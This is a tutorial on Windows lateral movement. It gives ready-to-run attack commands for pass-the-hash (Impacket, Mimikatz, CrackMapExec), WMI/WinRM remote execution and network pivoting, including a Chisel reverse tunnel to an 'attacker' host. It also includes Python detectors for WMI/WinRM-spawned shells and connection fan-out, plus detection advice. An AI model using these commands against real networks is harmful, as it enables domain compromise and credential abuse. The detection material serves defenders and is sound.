Key Takeaways

  • Pass-the-Hash: Use NTLM hashes without cracking passwords.
  • WMI/WinRM: Built-in Windows remote execution methods.
  • Pivoting: Use compromised hosts to reach internal networks.
  • Credential harvesting enables movement across the domain.

After compromising an initial host, lateral movement allows attackers to spread through the network, find valuable targets, and ultimately reach domain controllers or critical assets.

Pass-the-Hash (PtH)

# No password cracking needed—use the NTLM hash directly!

# Using Impacket
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 Administrator@192.168.1.10

# Using Mimikatz
sekurlsa::pth /user:Administrator /domain:CORP /ntlm:31d6cfe0d16ae931b73c59d7e0c089c0 /run:powershell

# Using CrackMapExec
crackmapexec smb 192.168.1.0/24 -u Administrator -H 31d6cfe0d16ae931b73c59d7e0c089c0

WMI Execution

# WMI remote command execution
wmic /node:192.168.1.10 /user:CORP\admin /password:Pass123 process call create "cmd.exe /c whoami > C:\output.txt"

# Using Impacket
wmiexec.py CORP/admin:Pass123@192.168.1.10

# PowerShell WMI
Invoke-WmiMethod -ComputerName DC01 -Credential $cred -Class Win32_Process -Name Create -ArgumentList "powershell.exe -enc BASE64"

PSRemoting / WinRM

# Enable PSRemoting session
Enter-PSSession -ComputerName DC01 -Credential CORP\admin

# Execute command remotely
Invoke-Command -ComputerName DC01,DC02 -ScriptBlock { whoami; hostname }

# Using Evil-WinRM
evil-winrm -i 192.168.1.10 -u admin -p Pass123
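The WMI and PSRemoting/WinRM techniques above leave a distinctive parent-process trail on the target: a process created through Win32_Process Create (wmic, wmiexec.py, Invoke-WmiMethod) is a child of WmiPrvSE.exe, and commands run through PSRemoting or Evil-WinRM execute under wsmprovhost.exe. The following added example, which is not part of the original page, runs that check over constructed Sysmon-style process-creation records (field names Image, ParentImage, CommandLine, Computer) and, when the spawned PowerShell carries an -EncodedCommand argument like the "powershell.exe -enc BASE64" line above, decodes it for the analyst. The sample events and host names are constructed.

```python
"""Added example: flag shells spawned by the WMI and WinRM host processes.

Input records are constructed Sysmon Event 1-style dicts; only the four field
names used below are assumed. Command lines are split on whitespace, which is
enough for these samples but not a full Windows command-line parser.
"""
import base64

# Parent processes that host remotely requested execution, mapped to the
# remote-execution channel they represent.
REMOTE_EXEC_PARENTS = {"wmiprvse.exe": "wmi", "wsmprovhost.exe": "winrm"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Constructed: base64 of the UTF-16LE string PowerShell expects after -enc.
ENCODED = base64.b64encode("whoami; hostname".encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {"Computer": "WS-12.corp.local", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"cmd.exe /c whoami > C:\output.txt"},
    {"Computer": "DC01.corp.local",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wsmprovhost.exe",
     "CommandLine": f"powershell.exe -enc {ENCODED}"},
    {"Computer": "WS-12.corp.local", "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
    {"Computer": "WS-12.corp.local",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File build.ps1"},
]


def basename(path):
    """Last path component, lower-cased, tolerating either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none.

    PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
    -enc, ...), so match tokens that are a prefix of the full switch; this
    correctly rejects -ExecutionPolicy / -ep, which are not prefixes of it.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        t = tok.lower()
        if len(t) >= 2 and t[0] in "-/" and "-encodedcommand".startswith("-" + t[1:]):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def detect_remote_exec(events):
    """Alert on cmd/powershell children of WmiPrvSE.exe or wsmprovhost.exe."""
    alerts = []
    for e in events:
        parent, child = basename(e["ParentImage"]), basename(e["Image"])
        if parent in REMOTE_EXEC_PARENTS and child in SHELLS:
            alerts.append({
                "rule": f"{REMOTE_EXEC_PARENTS[parent]}_spawned_shell",
                "host": e["Computer"],
                "child": child,
                "command_line": e["CommandLine"],
                "decoded_command": decode_encoded_command(e["CommandLine"]),
            })
    return alerts


if __name__ == "__main__":
    for a in detect_remote_exec(SAMPLE_EVENTS):
        print(a["rule"], a["host"], a["child"], a["decoded_command"])
```

Legitimate administration over WinRM and WMI produces the same parent/child pairs, so in practice this rule is scoped to hosts where remote management is not expected or joined with the originating account and source host from the matching 4624 event.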

Network Pivoting

# SSH Dynamic Port Forwarding (SOCKS proxy)
ssh -D 9050 user@compromised-host

# Chisel (fast TCP tunnel)
# On attacker: chisel server -p 8080 --reverse
# On victim: chisel client attacker:8080 R:socks

# Proxychains usage
proxychains nmap -sT 10.10.10.0/24
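Both a subnet sweep (the CrackMapExec line above) and a proxied scan like the proxychains/nmap line produce the same network-level shape: a single internal host opens connections to many distinct destinations in a short time, and with a SOCKS pivot the traffic originates from the compromised host rather than the attacker's machine. The added example below, not part of the original page, implements that fan-out check with a sliding time window over constructed connection records (timestamp, source IP, destination IP, destination port), a simplified stand-in for firewall, NetFlow or Sysmon Event 3 data.

```python
"""Added example: detect one internal host fanning out to many destinations.

Records are constructed, whitespace-separated lines:
    <ISO-8601 UTC timestamp> <src ip> <dst ip> <dst port>
The window length and host threshold are parameters to tune per network.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

BASE = datetime(2024, 5, 1, 10, 0, 0)

# Constructed: 192.168.1.7 touches 30 hosts on TCP/445 in 30 seconds (a sweep),
# while 192.168.1.20 talks to its file server and a web server as usual.
SAMPLE_LINES = [
    f"{(BASE + timedelta(seconds=i)).isoformat()}Z 192.168.1.7 192.168.1.{10 + i} 445"
    for i in range(30)
] + [
    f"{(BASE + timedelta(seconds=0)).isoformat()}Z 192.168.1.20 192.168.1.5 445",
    f"{(BASE + timedelta(seconds=5)).isoformat()}Z 192.168.1.20 192.168.1.6 443",
    f"{(BASE + timedelta(seconds=10)).isoformat()}Z 192.168.1.20 192.168.1.5 445",
]


def parse_connections(lines):
    """Parse the constructed record format into dicts with a datetime 'ts'."""
    conns = []
    for line in lines:
        if not line.strip():
            continue
        ts, src, dst, dport = line.split()
        conns.append({"ts": datetime.fromisoformat(ts.replace("Z", "")),
                      "src": src, "dst": dst, "dport": int(dport)})
    return conns


def detect_fanout(conns, window_seconds=60, host_threshold=20):
    """Alert the first time a source reaches >= host_threshold distinct
    destination hosts within any window_seconds-long sliding window."""
    by_src = defaultdict(list)
    for c in conns:
        by_src[c["src"]].append(c)

    alerts = []
    for src, items in by_src.items():
        items.sort(key=lambda c: c["ts"])
        window = deque()
        for c in items:
            window.append(c)
            # Drop records that fell out of the sliding window.
            while (c["ts"] - window[0]["ts"]).total_seconds() > window_seconds:
                window.popleft()
            hosts = {w["dst"] for w in window}
            if len(hosts) >= host_threshold:
                alerts.append({
                    "source": src,
                    "distinct_hosts": len(hosts),
                    "ports": sorted({w["dport"] for w in window}),
                    "window_end": c["ts"],
                })
                break  # one alert per source is enough for triage
    return alerts


if __name__ == "__main__":
    for a in detect_fanout(parse_connections(SAMPLE_LINES)):
        print(a["source"], a["distinct_hosts"], a["ports"], a["window_end"])
```

Vulnerability scanners, monitoring systems and backup servers trip this rule legitimately, so the usual deployment keeps an allow-list of known scanners and raises the threshold for them rather than disabling the check.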

Frequently Asked Questions

How do I detect lateral movement?
Monitor for unusual authentication events (Event IDs 4624 and 4625), WMI and PowerShell execution, NTLM authentication where Kerberos is expected, and SMB connections between workstations, and correlate them in EDR and SIEM.
